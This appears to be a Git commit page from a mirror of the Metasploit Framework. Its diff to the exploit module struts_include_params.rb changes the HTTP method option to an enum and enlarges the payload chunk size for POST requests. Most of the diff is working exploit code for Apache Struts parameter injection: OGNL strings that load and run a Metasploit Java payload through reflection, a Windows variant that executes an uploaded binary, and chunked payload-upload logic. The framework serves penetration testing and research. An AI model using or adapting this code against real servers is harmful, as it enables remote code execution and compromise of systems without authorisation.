infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Chunk length is now "huge" for POST method 

minor changes to option text and changed HTTPMETHOD to an enum.
unstable
Console 2013-05-30 11:30:24 +01:00
parent ab6a2a049b
commit fb388c6463
1 changed files with 13 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/exploits/multi/http/struts_include_params.rb
View File

@ -68,9 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(8080),
OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',rand_text_alpha_lower(4)]),
OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/struts2-blank3/example/HelloWorld.action"]),
OptString.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET']),
OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]),
OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]),
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
], self.class)
end
@ -96,8 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
'version' => '1.1',
'method' => 'GET'
})
else
fail_with(Exploit::Failure::Unknown, "Invalid HTTP method, use GET or POST")
end
return resp #Used for check function.
end
@ -125,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
puts exec_cmd.length
when 'windows'
@payload_exe = "./#{@payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
@ -134,10 +133,16 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Preparing payload...")
#Now with all the arch specific stuff set, perform the upload.
#109 = length of command string plus the max length of append.
#109 = length of cmd string from "java_upload_part" method plus the max length of the boolean value append.
sub_from_chunk = 109 + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length
case datastore['HTTPMETHOD']
when 'GET'
chunk_length = 2048 - sub_from_chunk
chunk_length = ((chunk_length/4).floor)*3
when 'POST'
chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about size.
end
while pl_exe.length > chunk_length
java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]